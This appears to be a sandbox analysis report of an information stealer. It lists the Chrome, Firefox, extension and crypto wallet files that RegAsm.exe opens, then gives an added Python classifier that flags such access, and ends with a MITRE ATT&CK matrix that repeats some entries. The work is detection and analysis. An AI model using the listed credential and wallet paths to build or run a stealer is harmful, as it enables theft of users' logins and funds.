                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
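The file-open trail above is the stealer's collection phase in one process: browser credential and cookie stores for Chrome, Edge and Firefox, dozens of Chrome extension storage directories (the stealer enumerates them looking for wallet extensions), and the data directories of desktop wallets, all read by RegAsm.exe, a signed .NET Framework utility that has no reason to touch any of them. The following classifier is an added example, not code from the report or from Joe Sandbox: it parses behaviour lines in the report's format, buckets each path by what it holds, and gives a per-process verdict. The path patterns are lifted from the lines above; the sample events, the chrome.exe control case and the list of unexpected reader binaries are the editor's constructed assumptions.

```python
"""
Classify file-access events against the browser credential stores and wallet
locations the stealer reads, and flag processes with no business opening them.
Added by the editor as an example; not code from the Joe Sandbox report. Path
patterns come from the "File opened:" lines above; SAMPLE_EVENTS are constructed
in that format, and UNEXPECTED_READERS is the editor's own assumption.
"""
import re
from collections import Counter, defaultdict

# Report lines read "Source: <process>File opened: <path>"; the constructed
# samples put a space before "File opened:" and the regex accepts both.
EVENT_RE = re.compile(r"^Source:\s*(?P<proc>.+?)\s*File opened:\s*(?P<path>.+?)\s*$")

# (category, pattern), first match wins; anchored on names the report shows.
CATEGORIES = [
    ("browser_credentials",
     re.compile(r"\\(?:Login Data(?: For Account)?|key4\.db|logins\.json)$", re.I)),
    ("browser_cookies", re.compile(r"\\(?:Network\\Cookies|cookies\.sqlite)$", re.I)),
    ("browser_history", re.compile(r"\\(?:places\.sqlite|formhistory\.sqlite|prefs\.js)$", re.I)),
    # Chrome/Edge extension IDs are 32 letters a-p; the stealer walks the
    # Local/Sync Extension Settings directories hunting wallet extensions.
    ("extension_storage", re.compile(r"\\(?:Local|Sync) Extension Settings\\[a-p]{32}$")),
    ("desktop_wallet",
     re.compile(r"\\AppData\\(?:Roaming|Local)\\(?:Exodus|Ledger Live|atomic|Coinomi|Bitcoin|"
                r"Binance|com\.liberty\.jaxx|Electrum(?:-LTC)?|Guarda)(?:\\|$)", re.I)),
]

# Signed .NET Framework hosts that .NET loaders routinely inject into (the
# report shows RegAsm.exe doing the stealing). Editor's list, not the report's.
UNEXPECTED_READERS = {"regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}

def parse_event(line):
    """Return (process, path) for a 'File opened' line, else None."""
    m = EVENT_RE.match(line)
    return (m.group("proc"), m.group("path")) if m else None

def classify_path(path):
    """Return the sensitive-path category of `path`, or None."""
    for name, pattern in CATEGORIES:
        if pattern.search(path):
            return name
    return None

def summarize(lines):
    """Map each process to a Counter of sensitive-path categories it opened."""
    hits = defaultdict(Counter)
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue  # "Directory queried" and other event kinds are ignored
        proc, path = event
        category = classify_path(path)
        if category:
            hits[proc][category] += 1
    return hits

def verdict(proc, counts):
    """Stealer pattern: an unexpected binary reading any secret store, or one
    process reading both browser secrets and desktop wallet files."""
    name = proc.rsplit("\\", 1)[-1].lower()
    secrets = counts["browser_credentials"] + counts["browser_cookies"]
    wallets = counts["extension_storage"] + counts["desktop_wallet"]
    if name in UNEXPECTED_READERS and (secrets or wallets):
        return "malicious"
    if secrets and counts["desktop_wallet"]:
        return "suspicious"  # no single legitimate application needs both
    return "benign"

def report(lines):
    """Verdict per process for a batch of behaviour lines."""
    return {proc: verdict(proc, counts) for proc, counts in summarize(lines).items()}

REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
PROFILE = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
_OPENED = [  # constructed (process, path) pairs mirroring the report's lines
    (REGASM, PROFILE + r"\Login Data"),
    (REGASM, PROFILE + r"\Network\Cookies"),
    (REGASM, PROFILE + r"\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    (REGASM, PROFILE + r"\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa"),
    (REGASM, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db"),
    (REGASM, r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    (REGASM, r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
    (CHROME, PROFILE + r"\Login Data"),  # a browser reading its own store is expected
]
SAMPLE_EVENTS = [f"Source: {p} File opened: {path}" for p, path in _OPENED] + [
    "Source: " + REGASM + r" Directory queried: C:\Users\user\Documents\EFOYFBOLXA",
]

if __name__ == "__main__":
    for proc, counts in summarize(SAMPLE_EVENTS).items():
        print(proc.rsplit("\\", 1)[-1], dict(counts), "->", verdict(proc, counts))
```

The two-tier verdict matters in practice: browsers open their own Login Data and extension storage all day, so a category hit alone is noise; what separates the stealer is the identity of the reader (a .NET registration tool) and the cross-application reach (browser secrets plus desktop wallet files from one process). Feed the same logic Sysmon file-access events or EDR telemetry instead of report lines by swapping EVENT_RE.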

Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix

Listed per tactic, top to bottom as in the report's matrix columns. The bracketed digits are the per-technique counters shown in the original matrix, reproduced as displayed; techniques without a counter carried none.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [12]; Native API [1]; Command and Scripting Interpreter [2]; Scheduled Task/Job [1]; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Create Account [1]; Valid Accounts [1]; Scheduled Task/Job [1]; Bootkit [1]; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Valid Accounts [1]; Access Token Manipulation [11]; Process Injection [11]; Scheduled Task/Job [1]; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools [1]; Obfuscated Files or Information [11]; Software Packing [1]; DLL Side-Loading [1]; Valid Accounts [1]; Virtualization/Sandbox Evasion [22]; Access Token Manipulation [11]; Process Injection [11]; Bootkit [1]
Credential Access: OS Credential Dumping [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; Account Discovery [1]; File and Directory Discovery [11]; System Information Discovery [23]; Security Software Discovery [321]; Virtualization/Sandbox Evasion [22]; Process Discovery [2]; System Owner/User Discovery [1]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [12]; Data from Local System [31]; Screen Capture [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [21]; Non-Application Layer Protocol [3]; Application Layer Protocol [114]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Data Encrypted for Impact [11]; System Shutdown/Reboot [1]; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
